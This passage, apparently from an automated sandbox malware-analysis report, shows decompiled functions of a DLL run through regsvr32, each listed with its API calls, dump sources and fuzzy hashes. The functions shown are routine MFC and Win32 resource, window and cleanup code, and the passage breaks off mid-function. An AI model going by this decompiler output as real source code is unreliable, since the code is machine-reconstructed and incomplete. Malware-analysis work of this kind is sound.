                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 1001836B
                                                                                                                • GetSysColor.USER32 ref: 1001837B
                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 10018385
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ObjectText
                                                                                                                • String ID:
                                                                                                                • API String ID: 829078354-0
                                                                                                                • Opcode ID: 1acd69621d3fed65b9aba393824c9cd69a63a529b189f48ae66a45ed895b073b
                                                                                                                • Instruction ID: f0d5099a693eeb0029ffa53bf9b215b6e22ef4be6effeed382749ae4f6f43190
                                                                                                                • Opcode Fuzzy Hash: 1acd69621d3fed65b9aba393824c9cd69a63a529b189f48ae66a45ed895b073b
                                                                                                                • Instruction Fuzzy Hash: 6501FB31900109ABEF91DF60EC85AAE7BA9EB04795F584620FA22D91E0D770CFD0DB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001CA95 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001CA95(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E1001C64C(_t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E10023187(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}















                                                                                                                0x1001ca99
                                                                                                                0x1001ca9b
                                                                                                                0x1001ca9d
                                                                                                                0x1001caa1
                                                                                                                0x1001caa3
                                                                                                                0x1001cad8
                                                                                                                0x1001cae2
                                                                                                                0x1001cae4
                                                                                                                0x1001caeb
                                                                                                                0x1001caeb
                                                                                                                0x00000000
                                                                                                                0x1001caf1
                                                                                                                0x1001caaa
                                                                                                                0x1001cab7
                                                                                                                0x1001cabf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001cac3
                                                                                                                0x1001cac9
                                                                                                                0x1001cacd
                                                                                                                0x1001cad6
                                                                                                                0x00000000
                                                                                                                0x1001cad6
                                                                                                                0x1001caf7

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1001CAB7
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,?,?,10021031,?,?,1000D18A,DF7C0CDA), ref: 1001CAC3
                                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,10021031,?,?,1000D18A,DF7C0CDA), ref: 1001CAD0
                                                                                                                • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,10021031,?,?,1000D18A,DF7C0CDA), ref: 1001CAEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 4108760c55753768d462f865b41ffcd9b3d9d5b3ee2fcc110227f12e73c1aa31
                                                                                                                • Instruction ID: 5661e288fa7dbb988df4e339b8a46c47127f1e798670e99cd3e35df3d68ae36c
                                                                                                                • Opcode Fuzzy Hash: 4108760c55753768d462f865b41ffcd9b3d9d5b3ee2fcc110227f12e73c1aa31
                                                                                                                • Instruction Fuzzy Hash: 7AF0F03A2412296BE742CBA55C84D3FB6ECEFC95A6B42003CFE05E7211CE70DC4182A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10013F80 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10013F80(void* __edx) {
				char _v4;
				char _v12;
				intOrPtr* _v16;
				void* __ecx;
				void* __esi;
				signed int _t14;
				signed int _t15;
				void* _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t32;
				intOrPtr* _t34;
				signed int _t36;

				_push(0xffffffff);
				_push(E10052632);
				_push( *[fs:0x0]);
				_push(_t23);
				_t14 =  *0x1006dbdc; // 0xdf7c0cda
				_t15 = _t14 ^ _t36;
				_t38 = _t15;
				_push(_t15);
				 *[fs:0x0] =  &_v12;
				_t34 = _t23;
				_v16 = _t34;
				 *_t34 = 0x10059734;
				_v4 = 3;
				E10021AC4(_t34 + 0x184, _t32, _t34, _t15);
				_v4 = 2;
				E10021AC4(_t34 + 0x130, _t32, _t34, _t15);
				_v4 = 1;
				E10021AC4(_t34 + 0xdc, _t32, _t34, _t38);
				_v4 = 0;
				E10021AC4(_t34 + 0x88, _t32, _t34, _t38);
				_v4 = 0xffffffff;
				_t21 = E1002BDE8(_t22, _t34, __edx, _t32, _t34, _t38);
				 *[fs:0x0] = _v12;
				return _t21;
			}
















                                                                                                                0x10013f80
                                                                                                                0x10013f82
                                                                                                                0x10013f8d
                                                                                                                0x10013f8e
                                                                                                                0x10013f90
                                                                                                                0x10013f95
                                                                                                                0x10013f95
                                                                                                                0x10013f97
                                                                                                                0x10013f9c
                                                                                                                0x10013fa2
                                                                                                                0x10013fa4
                                                                                                                0x10013fa8
                                                                                                                0x10013fb4
                                                                                                                0x10013fbc
                                                                                                                0x10013fc7
                                                                                                                0x10013fcc
                                                                                                                0x10013fd7
                                                                                                                0x10013fdc
                                                                                                                0x10013fe7
                                                                                                                0x10013fec
                                                                                                                0x10013ff3
                                                                                                                0x10013ffb
                                                                                                                0x10014004
                                                                                                                0x10014010

                                                                                                                APIs
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10013FBC
                                                                                                                  • Part of subcall function 10021AC4: __EH_prolog3.LIBCMT ref: 10021ACB
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10013FCC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10013FDC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10013FEC
                                                                                                                  • Part of subcall function 1002BDE8: __EH_prolog3.LIBCMT ref: 1002BDEF
                                                                                                                  • Part of subcall function 1002BDE8: GlobalFree.KERNEL32(?), ref: 1002BE1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task_impl$H_prolog3$FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 36242457-0
                                                                                                                • Opcode ID: 721071f11f51c364018cfe54477fa3493f99bfbb6d6ccb520add610a660b3209
                                                                                                                • Instruction ID: 1510f530a5ecaef1d1cdf92aaf8eb180ec908d96fcc9648accdaab38d48b524c
                                                                                                                • Opcode Fuzzy Hash: 721071f11f51c364018cfe54477fa3493f99bfbb6d6ccb520add610a660b3209
                                                                                                                • Instruction Fuzzy Hash: 7E017C380097819ED314CF28D851BDABBD4EF59720F844A0EE4A9432C1DB746508CBA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A7A0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E1000A7A0() {
				char _v4;
				char _v12;
				intOrPtr _v16;
				void* __ecx;
				void* __esi;
				signed int _t14;
				signed int _t15;
				void* _t21;
				intOrPtr _t22;
				void* _t30;
				signed int _t34;

				_push(0xffffffff);
				_push(E1005150F);
				_push( *[fs:0x0]);
				_push(_t22);
				_t14 =  *0x1006dbdc; // 0xdf7c0cda
				_t15 = _t14 ^ _t34;
				_t36 = _t15;
				_push(_t15);
				 *[fs:0x0] =  &_v12;
				_t32 = _t22;
				_v16 = _t22;
				_v4 = 3;
				E10021AC4(_t32 + 0x174, _t30, _t32, _t15);
				_v4 = 2;
				E10021AC4(_t32 + 0x120, _t30, _t32, _t15);
				_v4 = 1;
				E10021AF5(_t32 + 0xcc, _t30, _t32, _t36);
				_v4 = 0;
				E10021A4D(_t32 + 0x78, _t30, _t32, _t36);
				_v4 = 0xffffffff;
				_t21 = E10020C98(_t32, _t30, _t32, _t36);
				 *[fs:0x0] = _v12;
				return _t21;
			}














                                                                                                                0x1000a7a0
                                                                                                                0x1000a7a2
                                                                                                                0x1000a7ad
                                                                                                                0x1000a7ae
                                                                                                                0x1000a7b0
                                                                                                                0x1000a7b5
                                                                                                                0x1000a7b5
                                                                                                                0x1000a7b7
                                                                                                                0x1000a7bc
                                                                                                                0x1000a7c2
                                                                                                                0x1000a7c4
                                                                                                                0x1000a7ce
                                                                                                                0x1000a7d6
                                                                                                                0x1000a7e1
                                                                                                                0x1000a7e6
                                                                                                                0x1000a7f1
                                                                                                                0x1000a7f6
                                                                                                                0x1000a7fe
                                                                                                                0x1000a803
                                                                                                                0x1000a80a
                                                                                                                0x1000a812
                                                                                                                0x1000a81b
                                                                                                                0x1000a827

                                                                                                                APIs
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000A7D6
                                                                                                                  • Part of subcall function 10021AC4: __EH_prolog3.LIBCMT ref: 10021ACB
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000A7E6
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000A7F6
                                                                                                                  • Part of subcall function 10021AF5: __EH_prolog3.LIBCMT ref: 10021AFC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000A803
                                                                                                                  • Part of subcall function 10021A4D: __EH_prolog3.LIBCMT ref: 10021A54
                                                                                                                  • Part of subcall function 10020C98: __EH_prolog3.LIBCMT ref: 10020C9F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Task_impl
                                                                                                                • String ID:
                                                                                                                • API String ID: 2182512335-0
                                                                                                                • Opcode ID: 7f315b461508fa932f8164ff5143e08997d3b8af1e1fd0b8baf9fad85137aeb7
                                                                                                                • Instruction ID: db444dcca7405f81db96a322a9f437cad57cd2ec34596c01685f13a0e8433cee
                                                                                                                • Opcode Fuzzy Hash: 7f315b461508fa932f8164ff5143e08997d3b8af1e1fd0b8baf9fad85137aeb7
                                                                                                                • Instruction Fuzzy Hash: 21018F79009741CFE315CF24D441BDAB7E4EB58720F844A0EF4AA432C1DB74650887A3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100214A2 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100214A2() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E1001D39A(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E10020ED7(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E1003D2BE(_t16);
			}








                                                                                                                0x100214a2
                                                                                                                0x100214a5
                                                                                                                0x100214ad
                                                                                                                0x100214b3
                                                                                                                0x100214b3
                                                                                                                0x100214bb
                                                                                                                0x100214c2
                                                                                                                0x100214c2
                                                                                                                0x100214cb
                                                                                                                0x100214cd
                                                                                                                0x100214d3
                                                                                                                0x100214d6
                                                                                                                0x100214db
                                                                                                                0x100214db
                                                                                                                0x100214d6
                                                                                                                0x100214e5
                                                                                                                0x100214ea
                                                                                                                0x100214f2
                                                                                                                0x100214f7
                                                                                                                0x100214f7
                                                                                                                0x100214fd
                                                                                                                0x10021505

                                                                                                                APIs
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 100214C2
                                                                                                                • GetActiveWindow.USER32 ref: 100214CD
                                                                                                                • SetActiveWindow.USER32(?), ref: 100214DB
                                                                                                                • FreeResource.KERNEL32(?,?,00000024,10009C92), ref: 100214F7
                                                                                                                  • Part of subcall function 1001D39A: EnableWindow.USER32(?,00000000), ref: 1001D3A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ActiveEnable$FreeResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 253586258-0
                                                                                                                • Opcode ID: 0f78419244131bdc507acf83cf4c5c519e63c8e4908cbe74e2599e513c5479ec
                                                                                                                • Instruction ID: 144da58f2501560bc1c7b2dbcd48d629faaead7d86b7dde088ced9662b81623c
                                                                                                                • Opcode Fuzzy Hash: 0f78419244131bdc507acf83cf4c5c519e63c8e4908cbe74e2599e513c5479ec
                                                                                                                • Instruction Fuzzy Hash: 0FF03C38A40615CFDF12EB64DC855ADB7B2FF58B02F900525E44672261DB726D80CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10039E8D Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10039E8D(void* __ebx, void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t11 = __ecx;
				_t13 = __ecx;
				E10039B0A(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E10019C16(__ebx, _t11, _t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t14 = _t13 + 0x84;
				_t8 =  *_t14;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t12 + 0x20),  *(_t8 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t9;
				}
				return _t8;
			}









                                                                                                                0x10039e8d
                                                                                                                0x10039e91
                                                                                                                0x10039e93
                                                                                                                0x10039e98
                                                                                                                0x10039eac
                                                                                                                0x10039eae
                                                                                                                0x10039eb4
                                                                                                                0x10039eba
                                                                                                                0x10039ebe
                                                                                                                0x10039ec6
                                                                                                                0x10039ecc
                                                                                                                0x00000000
                                                                                                                0x10039ecc
                                                                                                                0x10039ed1

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10039B0A: GetStockObject.GDI32(00000000), ref: 10039B20
                                                                                                                  • Part of subcall function 10039B0A: InflateRect.USER32 ref: 10039BB9
                                                                                                                • ReleaseCapture.USER32 ref: 10039E98
                                                                                                                • GetDesktopWindow.USER32 ref: 10039E9E
                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 10039EAE
                                                                                                                • ReleaseDC.USER32(?,?), ref: 10039EC6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1260764132-0
                                                                                                                • Opcode ID: a2c3acf1e2e453df2f760b61173b1142a348cc0220d8ffe00eec45ed2784926c
                                                                                                                • Instruction ID: a59d17796b37ffe237d6abb3d5f5a7ab65e78e22822fd2a3be228eadfa2ed198
                                                                                                                • Opcode Fuzzy Hash: a2c3acf1e2e453df2f760b61173b1142a348cc0220d8ffe00eec45ed2784926c
                                                                                                                • Instruction Fuzzy Hash: DEE04F365002219FE7215F75ED4DB467BA4EF88352F114824F5858B166DB7AD850CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100386BF Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E100386BF(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x10070f24;
					if( *0x10070f24 == 0) {
						_t5 = GetTickCount();
						 *0x10070f24 =  *0x10070f24 + 1;
						__eflags =  *0x10070f24;
						 *0x1006dab8 = _t5;
					}
					_t4 = GetTickCount() -  *0x1006dab8;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x1006dab8 = _t4;
					}
					return _t4;
				}
				return E10038668(_t7, _t8, _t9, _t13, _t14, _a8);
			}









                                                                                                                0x100386bf
                                                                                                                0x100386c4
                                                                                                                0x100386d1
                                                                                                                0x100386df
                                                                                                                0x100386e1
                                                                                                                0x100386e3
                                                                                                                0x100386e3
                                                                                                                0x100386e9
                                                                                                                0x100386e9
                                                                                                                0x100386f0
                                                                                                                0x100386f6
                                                                                                                0x100386fb
                                                                                                                0x100386fd
                                                                                                                0x10038703
                                                                                                                0x10038705
                                                                                                                0x10038705
                                                                                                                0x00000000
                                                                                                                0x1003870a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 100386E1
                                                                                                                • GetTickCount.KERNEL32 ref: 100386EE
                                                                                                                • CoFreeUnusedLibraries.OLE32 ref: 100386FD
                                                                                                                • GetTickCount.KERNEL32 ref: 10038703
                                                                                                                  • Part of subcall function 10038668: CoFreeUnusedLibraries.OLE32 ref: 100386AC
                                                                                                                  • Part of subcall function 10038668: OleUninitialize.OLE32 ref: 100386B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 685759847-0
                                                                                                                • Opcode ID: 58750139c67a11acae0ddc8f75755ca330751f3d3c7bd4016983ab49dfd01929
                                                                                                                • Instruction ID: b47bdf0f090c39dd5d0a7a8417e74432adb76d31f73c56e95a4bac197a867448
                                                                                                                • Opcode Fuzzy Hash: 58750139c67a11acae0ddc8f75755ca330751f3d3c7bd4016983ab49dfd01929
                                                                                                                • Instruction Fuzzy Hash: 22E0E53480C325DEEB52FB74CDC96097AE1FB08246F204667E48196460C6B469C5CF56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100323BD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E100323BD(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E100160BC( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E100160BC( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E10031B2C(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E1003BB70(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E100182A6( &_v20);
										E1002F7C9(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E100160E7(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E100160E7(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E10031B2C(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}



























                                                                                                                0x100323c5
                                                                                                                0x100323c7
                                                                                                                0x100323cc
                                                                                                                0x100323df
                                                                                                                0x100323e3
                                                                                                                0x10032420
                                                                                                                0x10032420
                                                                                                                0x10032422
                                                                                                                0x10032425
                                                                                                                0x10032428
                                                                                                                0x10032441
                                                                                                                0x10032441
                                                                                                                0x10032444
                                                                                                                0x10032446
                                                                                                                0x1003244c
                                                                                                                0x1003244d
